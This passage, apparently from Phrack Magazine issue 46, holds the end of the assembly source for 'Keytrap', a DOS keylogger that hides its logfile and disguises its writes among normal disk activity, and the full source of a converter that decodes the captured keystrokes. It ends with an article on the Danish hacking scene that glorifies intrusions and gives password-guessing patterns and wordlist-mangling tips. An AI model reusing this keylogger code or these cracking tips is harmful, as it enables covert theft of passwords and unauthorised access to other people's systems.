  19909.         mov     hide, ah   ; save function # for hiding
  19910.       ;
  19911.         call    switch     ; always control the int 9's
  19912.         call    timer    ; always check restart timer
  19913.       ;
  19914.  cmp     done_flag, 1                    ; completely done ?
  19915.  je      B21                             ;
  19916.  cmp     must_write, 1                   ; need to write ?
  19917.  jne     B21                             ;
  19918.         cmp     bufptr, 400   ; push a write when buffer
  19919.         jae     A21    ; is full
  19920.       ;
  19921.         cmp     hide, 3Fh    ; disk read
  19922.         je      A21    ; (hide buffer write)
  19923.         cmp     hide, 40h    ; disk write
  19924.         je      A21    ;
  19925.         jmp     B21    ; can't hide, try another time
  19926.       ;
  19927.    A21: call    saveb                           ; write buffer
  19928.       ;
  19929.    B21: mov     using_21, 0                     ; no int-21 calls anymore
  19930.    C21: pop     ds                              ;
  19931.  pop     es                              ;
  19932.  popa                                    ;
  19933.  popf                                    ;
  19934.  jmp     dword ptr old_21_off            ;
  19935. ;------------------------------------------------
  19936.    D21: pop ds    ; already installed !
  19937.         pop es    ;
  19938.         popa     ;
  19939.         popf     ;
  19940.         mov     ax, 1    ; show installed
  19941.         iret     ;
  19942.       ;
  19943. ;==============================================================================
  19944.       ;
  19945. timer:  cmp     done_flag, 0   ; only check time when
  19946.  je      timerb    ; session is complete !
  19947.       ;
  19948.         mov     ah, 2Ch    ;
  19949.         int     21h    ; what's the time ?
  19950.         mov     al, ch    ;
  19951.         xor     ah, ah    ;
  19952.         mov     bx, 60    ;
  19953.         mul     bx    ; multiply hours by 60
  19954.         xor     ch, ch    ;
  19955.         add     ax, cx    ; add in the minutes
  19956.            ;
  19957.         mov     bx, stimem   ;
  19958.         cmp     ax, bx    ; is time now same as
  19959.         je      timerb    ; when session was completed
  19960.       ; if so, don't do anything
  19961.         xor     cx, cx    ;
  19962. timer1: cmp     bx, 1440   ; midnight then back to 0
  19963.         jb      timer2    ;
  19964.         xor     bx, bx    ;
  19965. timer2: inc     cx    ; minutes counter
  19966.         inc     bx    ;
  19967.         cmp     ax, bx    ; count until time now
  19968.         jne     timer1    ;
  19969.       ;
  19970.         cmp     cx, delaym   ;
  19971.         jb      timerb    ; should we reset ?
  19972.       ;
  19973.         mov     done_flag, 0   ; reset / next session
  19974. timerb: ret     ;
  19975.       ;
  19976. ;------------------------------------------------
  19977.       ;
  19978. switch: mov     ax, 3509h                       ;
  19979.  int     21h                             ;
  19980.  cmp     bx, offset int_9A               ; everything ok with 9A ?
  19981.  jne     sw1                             ; check offset
  19982.         mov     control, 0   ; show who has control
  19983.         ret            ;
  19984.                 ;
  19985.    sw1: cmp     control, 1   ; 9B already in use ?
  19986.         je      sw2    ; yes, don't do anything
  19987.         mov     ax, 3509h   ;
  19988.         int     21h    ;
  19989.         mov     old_9b_seg, es   ;
  19990.         mov     old_9b_off, bx   ;
  19991.         mov     ax, 2509h   ;
  19992.         lea     dx, int_9B   ;
  19993.         int     21h    ; use 9B instead of 9A !
  19994.         mov     control, 1   ; show who has control
  19995.    sw2: ret                                     ;
  19996.       ;
  19997. ;------------------------------------------------
  19998.       ;
  19999. saveb:  mov     ax, 3d01h                       ;
  20000.  mov     dx, 82h                         ;
  20001.  int     21h                             ; open logfile, r/w
  20002.  jc      probw                           ;
  20003.  mov     handle, ax                      ;
  20004.  mov     bx, ax                          ;
  20005.  mov     ax, 4202h                       ;
  20006.  xor     cx, cx                          ;
  20007.  xor     dx, dx                          ;
  20008.  int     21h                             ; point to eof
  20009.  jc      probw                           ;
  20010.  mov     ah, 40h                         ;
  20011.  mov     bx, handle                      ;
  20012.  mov     cx, bufptr                      ;
  20013.  lea     dx, buf                         ;
  20014.  int     21h                             ; write buffer
  20015.  jc      probw                           ;
  20016.  mov     ah, 3Eh                         ;
  20017.  mov     bx, handle                      ;
  20018.  int     21h                             ; close logfile
  20019.  jc      probw                           ;
  20020. ;------------------------------------------------
  20021.  mov     cx, bufptr                      ; no problems writing
  20022.  add     write_amount, cx                ; so add to written amount
  20023.       ;
  20024.  mov     cx, mkeys                       ; check number of keys logged
  20025.  cmp     write_amount, cx                ; all done ?
  20026.  jb      donew                           ;
  20027.       ;
  20028.  mov     done_flag, 1                    ; show session complete
  20029.         mov     write_amount, 0   ; written amount to 0
  20030.         call    gtime    ; grab stop time [minutes]
  20031.       ;
  20032. donew:  mov     must_write, 0                   ; no need to write anymore
  20033.  mov     bufptr, 0                       ; buffer pointer back to 0
  20034. probw:  ret                                     ; try again another time
  20035.       ; (if problem writing)
  20036. ;------------------------------------------------
  20037.       ;
  20038. gtime:  mov     ah, 2Ch    ; DONE
  20039.         int     21h    ; grab time in minutes
  20040.         mov     al, ch    ;
  20041.         xor     ah, ah    ;
  20042.         mov     bx, 60    ;
  20043.         mul     bx    ; multiply hours by 60
  20044.         xor     ch, ch    ;
  20045.         add     ax, cx    ; add in the minutes
  20046.         mov     stimem, ax   ; start time in minutes
  20047.         ret     ;
  20048.       ;
  20049. ;==============================================================================
  20050. ;==============================================================================
  20051.       ;
  20052. install:mov     bx, 80h                         ;
  20053.  cmp     byte ptr [bx], 0                ; any parameters ?
  20054.  je      bye                             ;
  20055.       ;
  20056.         mov   ax, 0ffffh   ;
  20057.         int     21h    ; already installed ?
  20058.         cmp     ax, 1    ;
  20059.         je      bye    ;
  20060.       ;
  20061.  call    conv                            ; convert command line numbers
  20062.  jc      bye                             ;
  20063.         call    clog    ; check or create logfile
  20064.       ;
  20065.         mov     ax, 3509h                       ;
  20066.  int     21h                             ;
  20067.  mov     old_9a_off, bx                  ; save old int 9
  20068.  mov     old_9a_seg, es                  ;
  20069.  mov     ah, 25h                         ;
  20070.  lea     dx, int_9A                      ;
  20071.  int     21h                             ; hook only 9A to start
  20072.       ;
  20073.  mov     ax, 3521h                       ;
  20074.  int     21h                             ;
  20075.  mov     old_21_off, bx                  ; save old int 21
  20076.  mov     old_21_seg, es                  ;
  20077.  mov     ah, 25h                         ;
  20078.  lea     dx, int_21                      ;
  20079.  int     21h                             ; point to new int 21
  20080.       ;
  20081.         mov     datasegm, ds   ; save this data segment area
  20082.       ; for later use in the ISR's
  20083.  mov     bx, offset install              ;
  20084.  mov     ax, 3100h                       ;
  20085.  mov     dx, bx                          ;
  20086.  mov     cl, 04h                         ;
  20087.  shr     dx, cl                          ;
  20088.  inc     dx                              ;
  20089.  int     21h                             ; end / save above install
  20090.       ;
  20091.    bye: mov ah, 4Ch    ; no installation
  20092.         int     21h    ; just end
  20093.       ;
  20094. ;==============================================================================
  20095.       ;
  20096.   conv: push    ds                              ; convert command line options
  20097.  pop     es                              ;
  20098.  mov     di, 81h                         ;
  20099.  conv1: inc     di                              ;
  20100.  cmp     byte ptr [di], 2fh              ; point to first "/"
  20101.  jnz     conv1                           ;
  20102.  inc     di                              ; point to first number
  20103.  call    mconv                           ; convert it
  20104.  jc      conv4                           ; any problems ?
  20105.  mov     logH, dx                        ;
  20106.  mov     logL, cx                        ; save max logfile size
  20107.         add     cx, dx    ;
  20108.         cmp     cx, 0    ; make sure not 0
  20109.         je      conv4    ;
  20110.       ;
  20111.  dec     di                              ;
  20112. conv2:  inc     di                              ;
  20113.  cmp     byte ptr [di], 2fh              ; point to second "/"
  20114.  jnz     conv2                           ;
  20115.  inc     di                              ; point to first number
  20116.  call    mconv                           ; convert it
  20117.  jc      conv4                           ; any problems ?
  20118.         cmp     dx, 0    ; bigger then 65535 ?
  20119.         ja      conv4    ;
  20120.  mov     mkeys, cx                       ; save key limit
  20121.       ;
  20122.  dec     di                              ;
  20123. conv3:  inc     di                              ;
  20124.  cmp     byte ptr [di], 2fh              ; point to third "/"
  20125.  jnz     conv3                           ;
  20126.  inc     di                              ; point to first number
  20127.  call    mconv                           ; convert it
  20128.  jc      conv4                           ; any problems ?
  20129.         cmp     dx, 0    ;
  20130.         ja      conv4     ; bigger then 65535 end
  20131.         cmp     cx, 1440   ;
  20132.         ja      conv4    ; bigger then 1440 end
  20133.         mov     delaym, cx   ; save session delay time
  20134.         clc     ; show no problems
  20135.         ret     ;
  20136. conv4:  stc     ; show problem
  20137.         ret     ;
  20138.       ;
  20139. ;------------------------------------------------
  20140.       ;
  20141.  mconv: xor     cx, cx                          ; main converter
  20142.  mov     dx, cx                          ; no comments here, all I
  20143.  mov     ah, ch                          ; know is that it works ! :)
  20144.  cld                                     ;
  20145.  dec     di                              ;
  20146.  convl: inc     di                              ;
  20147.  mov     al, es:[di]                     ; convert number at es:[di]
  20148.  xor     al, '0'                         ;
  20149.  cmp     al, 10                          ; carry flag will be set
  20150.  jae     convD                           ; if theres a problem
  20151.  shl     cx, 1                           ;
  20152.  rcl     dx, 1                           ;
  20153.  jc      convD                           ;
  20154.  mov     bx, cx                          ;
  20155.  mov     si, dx                          ;
  20156.  shl     cx, 1                           ;
  20157.  rcl     dx, 1                           ;
  20158.  jc      convD                           ;
  20159.  shl     cx, 1                           ;
  20160.  rcl     dx, 1                           ;
  20161.  jc      convD                           ;
  20162.  add     cx, bx                          ;
  20163.  adc     dx, si                          ;
  20164.  jc      convD                           ;
  20165.  add     cl, al                          ;
  20166.  adc     ch, 0                           ;
  20167.  adc     dx, 0                           ;
  20168.  jc      convD                           ;
  20169.  jmp     convl                           ;
  20170. convD: ret                                     ;
  20171.       ;
  20172. ;------------------------------------------------
  20173.       ;
  20174.   clog: mov     bx, 82h                         ; point to logfile
  20175.  null1: cmp     byte ptr [bx], 20h              ; find first space
  20176.  je      null2                           ;
  20177.  inc     bx                              ;
  20178.  jmp     null1                           ;
  20179.  null2: mov     byte ptr [bx], 0                ; replace space with 0
  20180.       ;
  20181.         mov   ax, 3D01h   ;
  20182.         mov     dx, 82h    ;
  20183.         int     21h    ; open the file
  20184.         jc      clog3    ;
  20185.         mov     handle, ax   ; good open, save handle
  20186.       ;
  20187.         mov     ax, 4202h                       ;
  20188.  mov     bx, handle                      ;
  20189.  xor     cx, cx                          ;
  20190.  xor     dx, dx                          ;
  20191.  int     21h                             ; mov pointer to eof
  20192.       ;
  20193.  cmp     logH, dx                        ; check size
  20194.  ja      clog4                           ; size ok
  20195.  cmp     logH, dx                        ;
  20196.  je      clog1                           ;
  20197.  jmp     clog2                           ; must be below, not ok
  20198.  clog1: cmp     logL, ax                        ;
  20199.  ja      clog4                           ; size ok
  20200.       ;
  20201.  clog2: mov     ax, 4301h                       ;
  20202.  mov     dx, 82h                         ;
  20203.  xor     cx, cx                          ;
  20204.  int     21h                             ; change file mode
  20205.  mov     ah, 41h                         ;
  20206.  mov     dx, 82h                         ;
  20207.  int     21h                             ; delete file
  20208.       ;
  20209.  clog3: mov     ah, 3Ch    ; create new
  20210.         mov     cx, 02h    ; (hidden)
  20211.         mov     dx, 82h    ;
  20212.         int     21h    ;
  20213.         mov     handle, ax   ;
  20214.       ;
  20215.  clog4: mov     bx, handle   ; close logfile handle
  20216.         mov     ah, 3Eh    ;
  20217.         int     21h    ;
  20218.         ret     ;
  20219.       ;
  20220. ;==============================================================================
  20221.  
  20222. end     begin
  20223.  
  20224. *****************************************************************************
  20225.  
  20226. ;
  20227. ;
  20228. ; CONVERT v1.0 - Keytrap logfile converter
  20229. ; By Dcypher@aol.com
  20230. ;
  20231. ; Usage: CONVERT logfile outfile
  20232. ;
  20233. ;        logfile - Keytrap's scancode data (logfile)
  20234. ;        outfile - Specify an output file name
  20235. ;
  20236. ;
  20237. ;----------------------------------------
  20238.      ;
  20239.  .286                            ;
  20240.  .model  small                   ;
  20241.  .code                           ;
  20242.  org     100h                    ;
  20243.      ;
  20244. start:  jmp     go                      ;
  20245.      ;
  20246. ;----------------------------------------
  20247.      ;
  20248. inhandle        dw 0                    ;
  20249. inpointH        dw 0                    ;
  20250. inpointL        dw 0                    ;
  20251. loaded          dw 0                    ;
  20252. last            db 0                    ;
  20253.      ;
  20254. outhandle       dw 0                    ;
  20255. outoffset       dw 0                    ;
  20256.      ;
  20257. ;----------------------------------------
  20258.      ;
  20259. table   db 002h, '1'                    ; scan-code table
  20260.  db 003h, '2'                    ;
  20261.  db 004h, '3'                    ;
  20262.  db 005h, '4'                    ;
  20263.  db 006h, '5'                    ;
  20264.  db 007h, '6'                    ;
  20265.  db 008h, '7'                    ;
  20266.  db 009h, '8'                    ;
  20267.  db 00Ah, '9'                    ;
  20268.  db 00Bh, '0'                    ;
  20269.  ;                               ;
  20270.  db 082h, '!'                    ;
  20271.  db 083h, '@'                    ;
  20272.  db 084h, '#'                    ;
  20273.  db 085h, '$'                    ;
  20274.  db 086h, '%'                    ;
  20275.  db 087h, '^'                    ;
  20276.  db 088h, '&'                    ;
  20277.  db 089h, '*'                    ;
  20278.  db 08Ah, '('                    ;
  20279.  db 08Bh, ')'                    ;
  20280. ;----------------------------------------
  20281.  db 01Eh, 'a'                    ;
  20282.  db 030h, 'b'                    ;
  20283.  db 02Eh, 'c'                    ;
  20284.  db 020h, 'd'                    ;
  20285.  db 012h, 'e'                    ;
  20286.  db 021h, 'f'                    ;
  20287.  db 022h, 'g'                    ;
  20288.  db 023h, 'h'                    ;
  20289.  db 017h, 'i'                    ;
  20290.  db 024h, 'j'                    ;
  20291.  db 025h, 'k'                    ;
  20292.  db 026h, 'l'                    ;
  20293.  db 032h, 'm'                    ;
  20294.  db 031h, 'n'                    ;
  20295.  db 018h, 'o'                    ;
  20296.  db 019h, 'p'                    ;
  20297.  db 010h, 'q'                    ;
  20298.  db 013h, 'r'                    ;
  20299.  db 01Fh, 's'                    ;
  20300.  db 014h, 't'                    ;
  20301.  db 016h, 'u'                    ;
  20302.  db 02Fh, 'v'                    ;
  20303.  db 011h, 'w'                    ;
  20304.  db 02Dh, 'x'                    ;
  20305.  db 015h, 'y'                    ;
  20306.  db 02Ch, 'z'                    ;
  20307.  ;                               ;
  20308.  db 09Eh, 'A'                    ;
  20309.  db 0B0h, 'B'                    ;
  20310.  db 0AEh, 'C'                    ;
  20311.  db 0A0h, 'D'                    ;
  20312.  db 092h, 'E'                    ;
  20313.  db 0A1h, 'F'                    ;
  20314.  db 0A2h, 'G'                    ;
  20315.  db 0A3h, 'H'                    ;
  20316.  db 097h, 'I'                    ;
  20317.  db 0A4h, 'J'                    ;
  20318.  db 0A5h, 'K'                    ;
  20319.  db 0A6h, 'L'                    ;
  20320.  db 0B2h, 'M'                    ;
  20321.  db 0B1h, 'N'                    ;
  20322.  db 098h, 'O'                    ;
  20323.  db 099h, 'P'                    ;
  20324.  db 090h, 'Q'                    ;
  20325.  db 093h, 'R'                    ;
  20326.  db 09Fh, 'S'                    ;
  20327.  db 094h, 'T'                    ;
  20328.  db 096h, 'U'                    ;
  20329.  db 0AFh, 'V'                    ;
  20330.  db 091h, 'W'                    ;
  20331.  db 0ADh, 'X'                    ;
  20332.  db 095h, 'Y'                    ;
  20333.  db 0ACh, 'Z'                    ;
  20334. ;----------------------------------------
  20335.  db 00Ch, '-'                    ;
  20336.  db 08Ch, '_'                    ;
  20337.      ;
  20338.  db 00Dh, '='                    ;
  20339.  db 08Dh, '+'                    ;
  20340.      ;
  20341.  db 01Ah, '['                    ;
  20342.  db 09Ah, '{'                    ;
  20343.      ;
  20344.  db 01Bh, ']'                    ;
  20345.  db 09Bh, '}'                    ;
  20346.      ;
  20347.  db 027h, ';'                    ;
  20348.  db 0A7h, ':'                    ;
  20349.      ;
  20350.  db 028h, 027h                   ; '
  20351.  db 0A8h, '"'                    ;
  20352.      ;
  20353.  db 033h, ','                    ;
  20354.  db 0B3h, '<'                    ;
  20355.      ;
  20356.  db 034h, '.'                    ;
  20357.  db 0B4h, '>'                    ;
  20358.      ;
  20359.  db 035h, '/'                    ;
  20360.  db 0B5h, '?'                    ;
  20361.      ;
  20362.  db 02Bh, '\'                    ;
  20363.  db 0ABh, '|'                    ;
  20364.      ;
  20365.  db 037h, '*'                    ;
  20366.  db 0B7h, '*'                    ;
  20367.      ;
  20368.  db 029h, '`'                    ;
  20369.  db 0A9h, '~'                    ;
  20370.      ;
  20371. ;----------------------------------------
  20372.      ;
  20373.  db 039h, 020h                   ; space
  20374.  db 0B9h, 020h                   ; space with shift
  20375.      ;
  20376.  db 00Eh, 011h                   ; backspace
  20377.  db 08Eh, 011h                   ; backspace with shift
  20378.      ;
  20379.  db 01Ch, 00Ah                   ; return
  20380.  db 09Ch, 00Ah                   ; return with shift
  20381.      ;
  20382.  db 0                            ; End of Table
  20383.      ;
  20384. ;==============================================================================
  20385.       ;
  20386.  fprob: mov     ah, 9                           ;
  20387.  lea     dx, ferr                        ;
  20388.  int     21h                             ;
  20389.  jmp     bye                             ;
  20390.       ;
  20391. prtuse: mov     ah, 9                           ;
  20392.  lea     dx, usage                       ;
  20393.  int     21h                             ;
  20394.       ;
  20395.    bye: mov     ah, 4Ch                         ;
  20396.  int     21h                             ;
  20397.       ;
  20398. ;------------------------------------------------
  20399.       ;
  20400.     go: mov     ah, 9                           ;
  20401.  lea     dx, namver                      ;
  20402.  int     21h                             ;
  20403.       ;
  20404.  mov     bx, 80h                         ;
  20405.  cmp     byte ptr [bx], 0                ;
  20406.  je      prtuse                          ;
  20407.       ;
  20408.  call    null                            ;
  20409.  call    check                           ;
  20410.  jc      fprob                           ;
  20411.       ;
  20412.    go1: call    ldata                           ;
  20413.  call    conv                            ;
  20414.  call    sdata                           ;
  20415.  cmp     last, 1                         ;
  20416.  jne     go1                             ;
  20417.  jmp     bye                             ;
  20418.       ;
  20419. ;------------------------------------------------
  20420.       ;
  20421.   null: mov     bx, 81h                         ;
  20422.  null1: inc     bx                              ;
  20423.  cmp     byte ptr [bx], 20h              ;
  20424.  jnz     null1                           ;
  20425.  mov     byte ptr [bx], 0                ;
  20426.       ;
  20427.  mov     outoffset, bx                   ;
  20428.  inc     word ptr [outoffset]            ;
  20429.       ;
  20430.  null2: inc     bx                              ;
  20431.  cmp     byte ptr [bx], 0Dh              ;
  20432.  jnz     null2                           ;
  20433.  mov     byte ptr [bx], 0                ;
  20434.  ret                                     ;
  20435.       ;
  20436. ;------------------------------------------------
  20437.       ;
  20438. check:  mov     ax, 3D00h                       ;
  20439.  mov     dx, 82h                         ;
  20440.  int     21h                             ;
  20441.  jc      check2                          ;
  20442.  mov     bx, ax                          ;
  20443.  mov     ah, 3Eh                         ;
  20444.  int     21h                             ;
  20445.  jc      check2                          ;
  20446.       ;
  20447.  mov     ah, 3Ch                         ;
  20448.  xor     cx, cx                          ;
  20449.  mov     dx, outoffset                   ;
  20450.  int     21h                             ;
  20451.  jc      check2                          ;
  20452.  mov     bx, ax                          ;
  20453.  mov     ah, 3Eh                         ;
  20454.  int     21h                             ;
  20455.  jc      check2                          ;
  20456.       ;
  20457.  clc                                     ;
  20458. check2: ret                                     ;
  20459.       ;
  20460. ;------------------------------------------------
  20461.       ;
  20462.  ldata: mov     ax, 3D00h                       ;
  20463.  mov     dx, 82h                         ;
  20464.  int     21h                             ;
  20465.  mov     inhandle, ax                    ;
  20466.       ;
  20467.  mov     ax, 4200h                       ;
  20468.  mov     bx, inhandle                    ;
  20469.  mov     cx, inpointH                    ;
  20470.  mov     dx, inpointL                    ;
  20471.  int     21h                             ;
  20472.       ;
  20473.  mov     ah, 3Fh                         ;
  20474.  mov     bx, inhandle                    ;
  20475.  mov     cx, 60000                       ;
  20476.  lea     dx, eof                         ;
  20477.  int     21h                             ;
  20478.  mov     loaded, ax                      ;
  20479.  cmp     ax, 60000                       ;
  20480.  je      ldata2                          ;
  20481.  mov     last, 1                         ;
  20482.       ;
  20483. ldata2: mov     ax, 4201h                       ;
  20484.  mov     bx, inhandle                    ;
  20485.  xor     cx, cx                          ;
  20486.  xor     dx, dx                          ;
  20487.  int     21h                             ;
  20488.  mov     inpointH, dx                    ;
  20489.  mov     inpointL, ax                    ;
  20490.       ;
  20491.  mov     ah, 3Eh                         ;
  20492.  mov     bx, inhandle                    ;
  20493.  int     21h                             ;
  20494.  ret                                     ;
  20495.       ;
  20496. ;------------------------------------------------
  20497.       ;
  20498.   conv: mov     cx, loaded                      ;
  20499.  lea     si, eof                         ;
  20500.       ;
  20501.  conv1: lea     di, table                       ;
  20502.       ;
  20503.  cmp     cx, 0                           ;
  20504.  je      conv6                           ;
  20505.       ;
  20506.  mov     al, byte ptr [si]               ;
  20507.  conv2: mov     ah, byte ptr [di]               ;
  20508.  cmp     ah, 0                           ;
  20509.  je      conv4                           ;
  20510.  cmp     ah, al                          ;
  20511.  je      conv3                           ;
  20512.  add     di, 2                           ;
  20513.  jmp     conv2                           ;
  20514.       ;
  20515.  conv3: inc     di                              ;
  20516.  mov     al, byte ptr [di]               ;
  20517.  mov     byte ptr [si], al               ;
  20518.  dec     cx                              ;
  20519.  inc     si                              ;
  20520.  jmp     conv1                           ;
  20521.       ;
  20522.  conv4: mov     byte ptr [si], 20h              ;
  20523.  dec     cx                              ;
  20524.  inc     si                              ;
  20525.  jmp     conv1                           ;
  20526.       ;
  20527.  conv6: ret                                     ;
  20528.       ;
  20529. ;------------------------------------------------
  20530.       ;
  20531. sdata:  mov     ax, 3D02h                       ;
  20532.  mov     dx, outoffset                   ;
  20533.  int     21h                             ;
  20534.  mov     outhandle, ax                   ;
  20535.       ;
  20536.  mov     ax, 4202h                       ;
  20537.  mov     bx, outhandle                   ;
  20538.  xor     cx, cx                          ;
  20539.  xor     dx, dx                          ;
  20540.  int     21h                             ;
  20541.       ;
  20542.  mov     ah, 40h                         ;
  20543.  mov     bx, outhandle                   ;
  20544.  mov     cx, loaded                      ;
  20545.  lea     dx, eof                         ;
  20546.  int     21h                             ;
  20547.       ;
  20548.  mov     ah, 3Eh                         ;
  20549.  mov     bx, outhandle                   ;
  20550.  int     21h                             ;
  20551.  ret                                     ;
  20552.       ;
  20553. ;------------------------------------------------------------------------------
  20554.  
  20555. namver  db 10,13
  20556.  db 'CONVERT v1.0',10,13
  20557.  db 'Keytrap logfile converter.',10,13
  20558.  db 'By Dcypher (Dcypher@aol.com)',10,13
  20559.  db 10,13,'$'
  20560.  
  20561. usage   db 'Usage: CONVERT logfile outfile',10,13
  20562.  db 10,13
  20563.  db '       logfile - Keytrap',27h,'s scancode data.',10,13
  20564.  db '       outfile - Specify an output file name.',10,13
  20565.  db 10,13,'$'
  20566.  
  20567. ferr    db 'WARNING: Problem with one of the files.',10,13
  20568.  db 10,13,'$'
  20569.  
  20570. ;------------------------------------------------------------------------------
  20571.  
  20572. eof     db 0
  20573.  end start                              ==Phrack Magazine==
  20574.  
  20575.                  Volume Five, Issue Forty-Six, File 27 of 28
  20576.  
  20577. ****************************************************************************
  20578.  
  20579.                              International Scenes
  20580.  
  20581. There was once a time when hackers were basically isolated.  It was
  20582. almost unheard of to run into hackers from countries other than the
  20583. United States.  Then in the mid 1980's thanks largely to the
  20584. existence of chat systems accessible through X.25 networks like
  20585. Altger, tchh and QSD, hackers world-wide began to run into each other.
  20586. They began to talk, trade information, and learn from each other.
  20587. Separate and diverse subcultures began to merge into one collective
  20588. scene and has brought us the hacking subculture we know today.  A
  20589. subculture that knows no borders, one whose denizens share the common goal
  20590. of liberating information from its corporate shackles.
  20591.  
  20592. With the incredible proliferation of the Internet around the globe, this
  20593. group is growing by leaps and bounds.  With this in mind, we want to help
  20594. further unite the communities in various countries by shedding light
  20595. onto the hacking scenes that exist there.  If you want to contribute a
  20596. file about the hacking scene in your country, please send it to us
  20597. at phrack@well.com.
  20598.  
  20599. This month we have files about the scenes in Denmark and Russia, updates
  20600. from Australia and Argentina, and a scan of Norway's toll-free exchange.
  20601.  
  20602. ________________________________________________________________________________
  20603.  
  20604.  
  20605.                   The Computer Underground in Denmark
  20606.  
  20607.  
  20608. Dear Phrack Readers, what follows is a little about the Danish
  20609. computer underground, focusing on the hacking/phreaking scene.
  20610.  
  20611. A little introduction:
  20612.  
  20613. Even though Denmark itself is little country, with a little over 5 million
  20614. citizens, an active computer underground community thrives upon the growing
  20615. network links and computer systems which in these days seems to pop up all
  20616. over country.
  20617.  
  20618. The history of the hacking community in DK is not very old, but since the
  20619. first Danish hackers appeared some 5 years ago, there has been increasing
  20620. hacking activity, bringing on a history of busts, paranoia and times of war;
  20621. but also a history of great friendships, supremacy over the corporate machine,
  20622. and a process of learning more about the world we live in. But before we take
  20623. a look at the networks, boards and the community itself, let's go back in time,
  20624. and find the place where it all started.
  20625.  
  20626. The Past:
  20627.  
  20628. The first hackers to appear in DK was JubJub Bird and Sprocket, two high
  20629. school students which broke into 100's of computers world wide. At that time
  20630. there was no H/P scene in DK, no boards, no HP networks and no fellow hackers.
  20631. Nevertheless, JubJub's role in the Danish HP history plays a key role. JubJub
  20632. got busted early January '90, after being discovered in some of NASA's non
  20633. public machinery, and being under surveillance for a period of time. This was
  20634. the beginning of what was to become the Danish hacking scene. JubJub and
  20635. Sprocket never got a sentence, since the court had absolutely no idea of how
  20636. to handle a case like this. The court sat down a period of 2 years, and if
  20637. JubJub or Sprocket was caught in hacking within that period they would
  20638. get a verdict.
  20639.  
  20640. Anyway, after the bust of JubJub and Sprocket, the first stirs of hackers
  20641. appeared and began to expand like rings in water. And suddenly we had a growing
  20642. happy hacking community. Hackers from all over the country gathered at newly
  20643. started 'HPA only boards' which was a rarely seen thing among the sea of WaReZ
  20644. boards. One of the coolest boards was Fantasia, the headquarters of MoTIGoL,
  20645. which was being run by Netrunner. Fantasia was the largest in Denmark, maybe
  20646. even in Scandinavia, and had callers from all over the world. At that time,
  20647. nobody was afraid of getting busted, and A LOT of BlueBoxing, X25, and general
  20648. hacking on Inet was done. But one day all that changed.
  20649.  
  20650. During the winter '91 DIKU (Institute of computer science, Copenhagen
  20651. university) was used as a meeting place of hackers. A lot of novice hackers
  20652. used the machines to learn about Internet and UNIX in general, skating through
  20653. the internet, trading info, chatting at IRC and stuff like that. What nobody
  20654. knew was that Jgen Bo Madsen, security expert and high paid consultant
  20655. working for UNI*C, was monitoring all traffic from and off DIKU, with evil
  20656. intentions of busting! The law enforcement specter was soon to cast its dark
  20657. shadow on the whole of the Danish scene.
  20658.  
  20659. It all ended one winter afternoon. I remember turning on the TV, not really
  20660. paying attention to the news, reading a book or so, when suddenly the news
  20661. lady starts speaking about how the secret service is soon to unravel the biggest
  20662. hacker conspiracy ever in Denmark, one hacker was already arrested and 10 more
  20663. would be arrested in near future. Saron was the one who got busted. He had used
  20664. an x25 datapak link, which normally only was used for electronic mail, to
  20665. access DIKU, coming in from a German PAD to make tracing harder, but also
  20666. making a hell of a big bill for the stolen NUI's owner. Anyway, it came out
  20667. that JBM (Jgen Bo Madsen) had traced 76 calls to DIKU, and had monitored the
  20668. breakins of computers in Greece, Brazil, Mexico and USA.
  20669.  
  20670. At that moment the entire scene more or less panicked. Most dudes moved
  20671. their precious machinery out of the house and all boards closed down.
  20672. A period of isolation began. The SysOp of Fantasia, Netrunner pulled out his
  20673. harddisk hiding it somewhere out of reach, if JBM and his secret service
  20674. buddies should show up.
  20675.  
  20676. No more busts happened and people calmed down after a month or so. Everybody
  20677. knew that things wouldn't be the same after the DIKU incident. Netrunners
  20678. harddisk broke down after he had reinstalled it, because all the dirt it
  20679. had consumed from 2 years constant running, was too much for the thing to
  20680. handle when it was powered back on. So, Fantasia closed and the underground
  20681. network PhoenixNet also closed when it came out that JBM had infiltrated
  20682. the net. An era was over, and a new was to begin.
  20683.  
  20684.  
  20685. The Present:
  20686.  
  20687. Today's scene is doing quite good. It has became harder in a way, more
  20688. careful and more closed than ever. But still, we have open boards
  20689. and a public network. FOOnet which focuses on computer security and is
  20690. used as an forum open for discussions. Mostly by hackers and people into
  20691. computer security in general, but every once in awhile JBM and Sysadm's
  20692. drop by too. Also, the Danish scene is proud to release CrackerJack, made by
  20693. Jackal, which we still claim is the fastest UNIX passwd cracker available for
  20694. PC. Not that cracking passwd files is a major element in hacking, but its nice
  20695. to have a fast cracker every once in awhile :)
  20696.  
  20697. The Danish computer underground scene is filled with WaReZ boards,
  20698. but only a few real H/P/A boards are running. Boards like Free Speech Inc.
  20699. and Freeside are places where the Danish hackers hang out. None of these
  20700. boards are public, but JBM is quite aware of them and had once infiltrated
  20701. Freeside, even though it was clearly stated that the bbs was private and
  20702. no one related to any gov agencies was allowed to use the board. So, JBM
  20703. is actually doing what he has accused us for over the years, which is
  20704. intruding people's privacy.
  20705.  
  20706. Other than FOOnet, there is a few other networks, such as SDC which
  20707. once had a good mail flow in the hacking conferences, but today more
  20708. is turning into a demo/warez net. A few other truly H/P nets are running
  20709. successful with a good mail flow, but those shall remain anonymous in
  20710. this article.
  20711.  
  20712. The links from the Danish scene to fellow hackers around the world is
  20713. very good. Due to numerous nights spent at QSD, connections is established
  20714. to a lot of dudes in Brazil which frequently drops by Free Speech Inc. and
  20715. Freeside, dudes in UK as well as fellow hackers in US like Alby/Empire.
  20716.  
  20717. Okay, this is it. The section about hacking in Denmark. The stuff
  20718. that you had to read all the above boring shitty sentimental stuff,
  20719. to get to!!
  20720.  
  20721.  
  20722. Hacking in Denmark:
  20723.  
  20724. The two main networks in DK which is used for hacking and meeting fellow
  20725. hackers are, (of course) Internet and the X25 datapak link. Internet is
  20726. accessible via all Universities like diku.dk, daimi.aau.dk, auc.dk and so on.
  20727. (Nobody uses DIKU anymore though). The university is doing a brave struggle
  20728. to keep the hackers out by upgrading to C2 passwd security, meaning that
  20729. passwds must be at least 8 chars, contain 1 uppercase and 1 non alphabetic
  20730. char.
  20731.  
  20732. The upper level of the top 10 of chosen C2 security passwd's goes something
  20733. like: q1w2e3r4*, a1s2d3f4*, these do not contain any uppercase chars and
  20734. therefore should not have been accepted as a passwd by the system, but
  20735. apparently the C2 software finds them secure. Also, a nice thing to do is
  20736. taking your wordlist and using Therion's Passwd Utility, TPU which is a word
  20737. list manipulator, and add a 1* to all words in the list and uppercase the first
  20738. letter. Gives a lot of accounts.
  20739.  
  20740. Another popular thing, in order to keep hackers out, is to setup a so-called
